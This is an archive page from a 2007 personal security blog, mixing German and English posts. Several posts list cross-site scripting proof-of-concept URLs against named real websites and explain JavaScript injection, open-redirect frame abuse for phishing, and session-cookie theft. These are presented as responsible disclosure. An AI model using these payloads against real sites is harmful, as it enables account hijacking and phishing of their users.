Friday, July 13. 2007More XSS
I thought I'd give you some more (all have been informed months ago):
http://thepiratebay.org/search/"><script>alert(1)</script> http://www.gruene.de/cms/default/dok/144/144640.dokumentsuche.htm?execute=1&suche_voll_starten=1&volltext_suchbegriff="><script>alert(1)</script> http://www.terions.de/index_whois.php?ddomain="><script>alert(1)</script> http://www.eselfilme.com/newsletter/newsletter.php?action=sign&email="><script>alert(1)</script> http://www.region-stuttgart.de/sixcms/rs_suche/?_suche="><script>alert(1)</script> http://reports.internic.net/cgi/whois?whois_nic="><script>alert(1)</script>&type=domain Thursday, July 12. 2007XSS on helma/gobi
I still have some unresolved xss vulnerabilities around. It seems to be common practice by many web application developers and web designers to ignore such information.
This time we have gobi, a cms system based on the quite popular javascript application server helma. http://int21.de/cve/CVE-2007-3693-gobi.txt More to come. As this xss stuff is far too easy (try some common strings in web forms, inform the author, publish some weeks later), I think about doing some kind of automated mechanism to search and report those vulnerabilities. Sunday, June 17. 2007How good security works
I recently wrote that I'm sometimes a bit unhappy how security issues are handled in free software project.
Now, to have some contrast, today I'll talk about an example how to do it right. Serendipity, the software I'm using to host this blog, had an SQL injection vulnerability. On the same day, they announced it and provide updated packages. The finder of the vulnerability is also mentioned. Now, it is only able to get password-hashes, many other projects probably would've treated this vulnerability as »low-impact« or something like that. But beside that, they also provide some tipps how to check if the vulnerability has already been exploitet and suggest to change user passwords. A while back, there was another vulnerability reported in serendipity. The authors said they don't think that it's really a vulnerability and it probably can't be used for anything evil. But anyway, an update was released and announced just to be sure. Now, that's good security-work. The fact that serendipity has very few vulnerabilities at all already is very good. The fact they treat the few ones proper is even better. Some other projects should have a look at that.
Posted by Hanno Böck
in Code, English, Gentoo, Linux, Security, Webdesign
at
23:51
| Comment (1)
| Trackbacks (0)
Wednesday, May 23. 2007webinale 07 vorbei
Bin gerade auf der Abschlussveranstaltung und Zeit für ein kleines Feedback.
Man hatte etwas den Eindruck, dass deutlich mehr Aussteller als Besucher anwesend waren. Lag vermutlich an den hohen Preisen, weswegen kaum Laufpublikum anwesend war. Das heiße Wetter tat sein übriges und führte auch dazu, dass die Menschen an den Infoständen meist etwas erschöpft aussahen ;-) Kontakte gab's so nur wenige, einige Interessenten an CAcert, ein paar Ubuntu-CDs gingen weg. Trotz allem würd ich mich nächstes Mal wieder beteiligen. Weitere Bilder sind eben auch hochgeladen worden.
Posted by Hanno Böck
in Code, Computer culture, Life, Webdesign
at
17:54
| Comments (2)
| Trackbacks (0)
Tuesday, May 22. 2007Webinale
In wenigen Stunden geht's los zur webinale open in Ludwigsburg. Dort werden wir als Linux User Group Backnang präsent sein, ebenso wird schokokeks.org sich präsentieren.
Am LUG-Stand werden wir verschiedene Projekte, unter anderem OpenStreetMap und CAcert, vorstellen, sowie Kubuntu-CDs verteilen und Compiz zeigen. Erste Bilder
Posted by Hanno Böck
in Computer culture, Linux, Webdesign
at
03:07
| Comment (1)
| Trackbacks (0)
Defined tags for this entry: cacert, linux, ludwigsburg, lug, lugbk, openstreetmap, schokokeks, web20, webinale
Friday, May 11. 2007Short Tip: Change Serendipity URLs
Up until recently, I had URLs of the form /item/number, which is due to the reason that this was the URL-naming-scheme of bblog, an ancient blogging software I used years back. Now serendipity supports URLs with the title (minus problematic charakters), which is much better for search engines, because they often rate words that appear in the url better. Now, changing the URL after years of blogging doesn't seem appropriate (probably hundreds of links, trackbacks, bookmarks), so I needed some migration path. Serendipity doesn't support two url schemes out of the box, so I hacked some bash to do the trick. This will generate (after changing the url) forward rules (add them to .htaccess after the s9y-stuff), which send a »moved permanently«-answer. This has do be done only once, as there won't be links on new articles with the old scheme.
It's a fast hack and it probably doesn't fit in other situations without changes, but it's a nice example how fast you get somewhere with some bash and sed magic: for i in `seq 1 31`; do Wednesday, April 25. 2007Bißchen mehr Interaktives: Tippfehler
Gestern fiel mir ein Tippfehler im Titel eines wenige Tage zuvor geschriebenen Eintrages auf (Nachrichtem statt Nachrichten). Nun erlaubt es ja das elektronische Medium, im Gegensatz zum Gedruckten, derartige Schnitzer schnell und lautlos zu korrigieren.
Indes, und hier kommt ihr ins Spiel, glaube ich kaum, dass keinem meiner Leser dieser doch recht offensichtliche Tippfehler aufgefallen ist. Deswegen sei hier dazu aufgerufen: Tipp-, Rechtschreib-, Grammatik- oder auch rein faktische Fehler dürfen gerne in einer formlosen, kurzen eMail oder meinetwegen auch anonym als Kommentar gepostet werden (wird dann, wenn nicht weiter relevant, anschließend gelöscht).
Posted by Hanno Böck
in Computer culture, Life, Webdesign
at
14:51
| Comments (8)
| Trackbacks (0)
Defined tags for this entry: blog, tippfehler
Friday, March 30. 2007Cross Site Scripting all over the internet
It's terrifying how many sites there are out there with XSS-issues.
http://www.netbeat.de/bestellen/domaincheck.html?<script>alert(1)</script> http://www.netbeat.de/support/kommentare.html?name="><script>alert(1)</script> http://www.symlink.ch/users.pl?unickname="><script>alert(1)</script> http://www.stuttgart.de/sde/search.php?search=%22><script>alert%281%29</script> http://www.holidayranking.de/search.html?searchSearchString="><script>alert(1)</script> http://www.freecity.de/suche/index.phtml?gosearch=yes&words="><script>alert(1)</script> http://search.netdoktor.com/results.html?qt="><script>alert(1)</script>&la=de http://www.vfb.de/de/suche/index.php?words="><script>alert(1)</script> http://www.dvd.de/dvd-and-date/alledvd.asp?strTxt="><script>alert(1)</script> Note: All have been informed more than a week ago. I also had a bunch of others that got fixed after notification of the webmasters. Napster and MPAA still unfixed. Tuesday, March 20. 2007Liegt bestimmt an der Firewall
Folgende Nachricht schrieb ich an den Support von Napster (das ist dieser DRM-Shop, hervorgegangen aus dem Label eines längst vergessenen Projekts):
Die Suche auf napster.de ist anfällig für eine Cross Site Scripting Attacke: http://www.napster.de/search_music.html?op=search&artist_name="><script>alert(1)</script> Folgende, überaus kompetente Antwort erhielt ich: Diese Meldung erscheint, wenn Sie ein Anti-Virus Programm oder die Firewall aktiviert haben. Bitte, erlauben Sie Napster in dem betreffenden Programm.
Posted by Hanno Böck
in Code, Computer culture, Security, Webdesign
at
22:47
| Comments (5)
| Trackbacks (0)
Thursday, March 15. 2007XSS der Woche
Ich wusste doch immer dass die von der Filmindustrie das mit dem Internetz nicht verstanden haben:
Posted by Hanno Böck
in Copyright, Movies, Security, Webdesign
at
00:43
| Comments (3)
| Trackbacks (0)
Monday, March 12. 2007XSS on eplus.de
Note: This is just a short form of a german article I posted today. E-Plus is a big german mobile telephony provider. I've found a bunch of XSS together with Alexander Brachmann (responsible disclosure, all reported to E-Plus before, probably more to come).
For my english visitors, here are the urls: http://www.eplus.de/meta/shopsuche/suche_ausgabe.asp?suchwort="><script>alert(1)</script> http://www.eplus.de/frame.asp?go=http://www.eplus.de/');alert(1);document.write(' http://www.eplus.de/frame.asp?go=');alert(' Already fixed ones: http://www.eplus.de/frame.asp?go=http://www.google.de/ http://www.eplus.de/frame.asp?go=http://www.eplus.de@www.google.de http://www.eplus.de/frame.asp?go=http://www.eplus.dedomain.com http://www.eplus.de/frame.asp?go=http://www.eplus.de.mydomain.com XSS für Einsteiger: Spaß mit eplus.de
Von XSS (Cross Site Scripting) spricht man, wenn es durch Usereingaben möglich ist, bei einer Seite eigenen HTML und JavaScript-Code einzufügen. Das ist insbesondere dann ein Problem, wenn die Seite (auf der selben Domain reicht) in irgendeiner Weise Sessions und Accounts nutzt. Warum? Weil es trivial möglich ist, mit etwas JavaScript-Code das Session-Cookie zu übertragen und somit den Account zu hijacken.
Ein simples Beispiel: http://www.eplus.de/meta/shopsuche/suche_ausgabe.asp?suchwort="><script>alert(1)</script> Durch die bloße Eingabe von "><script>alert(1)</script> oder <script>alert(1)</script> lässt sich jedes Formular auf triviale XSS-Probleme checken (einfach mal ausprobieren). Problemfall Frames: Aufgrund der Tatsache, dass ein bestimmter Framezustand nicht in einer URL festhaltbar ist, haben sich viele Menschen mehr oder weniger sinnvolle Fakes ausgedacht, die dann häufig in der Form http://mydomain.com/framescript?location=siteinframe daherkommen. Nun kann man sowas ausnutzen, um in einem Frame eine Fremdseite darzustellen. Bis vor kurzem funktionierte dies noch: http://www.eplus-unternehmen.de/frame.asp?go=http://www.google.de/ Kurze Zeit später wurde selbiges gefiltert, mit folgendem kam man aber immer noch weiter: http://www.eplus.de/frame.asp?go=http://www.eplus.de@www.google.de http://www.eplus.de/frame.asp?go=http://www.eplus.dedomain.com http://www.eplus.de/frame.asp?go=http://www.eplus.de.mydomain.com Gehen inzwischen alle nicht mehr. Problem? Phishing. Funktioniert selbiges bei einer Bank oder einem sonstigen Unternehmen, bei dem größere Beträge eine Rolle spielen, ist es für Phisher attraktiv, unbedarften Menschen eine Nachricht zu schicken, die eine echt aussehende URL des Unternehmens enthält. Was bei obriger URL nach wie vor funktioniert, ist eine etwas trickreichere JavaScript-Injection: http://www.eplus.de/frame.asp?go=http://www.eplus.de/');alert(1);document.write(' http://www.eplus.de/frame.asp?go=');alert(' Das schöne hierbei ist, dass die Variable direkt in bereits bestehenden JavaScript-Code eingefügt wird. Desweiteren hat eplus noch mehr Domains und anderswo funktioniert es noch: http://www.eplus-unlimited.de/3_1_jingles/index.jsp?toLoad=http://www.google.de// E-Plus wurde vor über einem Monat mit den ersten Lücken kontaktiert. Die Schließung erfolgte schleppend, weswegen mir die Veröffentlichung hier angemessen erscheint. Die Veröffentlichung wurde vor einer Woche angekündigt. Es wurden keine Lücken publiziert, von denen E-Plus nicht schon mindestens vor einer Woche bescheid wusste. Credits gehen vor allem an Alexander Brachmann. In aller Regel betreibe ich Responsible Disclosure: Vor einer öffentlichen Publizierung wird der Anbieter oder Autor der Software mit Vorlauf informiert. Heut abend beim Webmontag gibt's ne Kurz-Präsentation. Sunday, March 11. 2007Spam von OKTE
Ich hab zwar keine Ahnung, was OKTE ist oder was die anbieten, aber die haben mir gerade Spam geschickt.
Sidenote: okte.cn/user.asp?n="><script>alert(1)</script> (Copy & Paste bitte, ich hoffe, dass das so deren Pagerank nicht positiv beeinflußt) No responsible disclosure for spammers!
Posted by Hanno Böck
in Computer culture, Security, Webdesign
at
03:52
| Comments (0)
| Trackbacks (0)
Sunday, February 11. 2007Best viewed with any browser?
Now, if you've been on the internet a bit longer, you may remember those sites at the end of the 90s telling you that they're »best viewed with a resolution of 1024x768 and the Microsoft Internet Explorer version 6.0". Luckily, most of those pages disappeared with the upcoming success of Mozilla Firefox and others (oh, there are still some, e. g. the cinema in my home town, but ie6 runs on wine).
As you may know, I'm a happy KDE user and have been using Konqueror as my everyday browser for some time now. Recently, I discovered more and more pages I couldn't use any more. I had to start this thing called Firefox. I don't like it, but that is not the point here. I even noticed today that ebay has a new interface that konqueror doens't like. This is a result of the more and more upcoming AJAX/JavaScript-stuff, which is often nice, I saw a lot of well designed web applications lately (ok, I saw a lot of crap, too). I'm not enough into JavaScript to know if it's the lack of support by Konqueror or the pages. I just hope that people will come together and find solutions for that. I remember that there was some discussion about using webcore (the khtml-fork used by apples safari) for konqueror, don't know if that would make it better, maybe some users of this drm-crippled system could comment on that.
Posted by Hanno Böck
in Code, English, Gentoo, Linux, Webdesign
at
00:42
| Comments (9)
| Trackbacks (0)
Thursday, October 5. 2006Planet statt Linkliste
Die Linkliste auf andere Blogs in meiner Sidebar war mir schon länger ein Dorn im Auge. Irgendwie unflexibel, immer entscheiden, wer jetzt wichtig genug dafür ist, was tun mit Blogs, die nur selten bedient werden. Die naheliegende Variante: Linkliste wird durch ein Planet ersetzt, die obersten Einträge erscheinen in der Sidebar. Hat den Vorteil, dass diejenigen öfters verlinkt werden, die mehr schreiben.
Da mir die originale Planet-Software immer weniger gefallen hat (viel zu oft mysteriöse Ereignisse, plötzlich tauchen uralt-Einträge wieder auf, die alle anderen von oben verdrängen), betreibt Harvester selbigen. Gefällt mir auf den ersten Blick tendenziell besser als Planet, ist in Ruby geschrieben und braucht in der jüngsten Version eine Datenbank als Backend. Upstream sieht hierfür PostgreSQL vor, Bernd hat dankenswerter Weise einen Patch für MySQL geschrieben. Ein Problem ist im Moment noch, dass jeder HTML-Fehler und insbesondere auch in XHTML 1.1 nicht mehr existente HTML-Kommandos und Entities ständig dazu führen, dass mein Blog nicht mehr validiert. Muss ich mal schaun, im Prinzip kann man ja HTML-Tags rausstrippen und Entities, sowie non-Unicode-Zeichen in UTF-8 konvertieren. Wer sich nun fragt, warum sein Feed nicht auftaucht, dafür kommen tendenziell folgende Varianten in Frage: 1. Feed kaputt/validiert nicht. Mag Harvester garnicht. Lösung: lynx --source [feed-url] | xmllint --noout - und fixen. 2. Ich kenn Dein Blog nicht. Fix: In den Comments melden. 3. Ich habs vergessen/verpeilt/irgendwann in den endlosen weiten meines Feedreaders verloren gegangen: Try 2. 4. Ich finde Dein Blog langweilig. Vermutlich nicht fixbar. Zu guter letzt und da ich schon drauf angeprochen worden bin: Aufgeführt im Planet impliziert nicht zwingend inhaltliche Übereinstimmung mit den Schreibenden. Als nächstes steht dann eine scuttle-basierte Linkliste an.
« previous page
(Page 2 of 4, totaling 52 entries)
» next page
|
About meYou can find my web page with links to my work as a journalist at https://hboeck.de/.
You may also find my newsletter about climate change and decarbonization technologies interesting. Hanno Böck mail: hanno@hboeck.de Hanno on Mastodon Impressum Show tagged entries |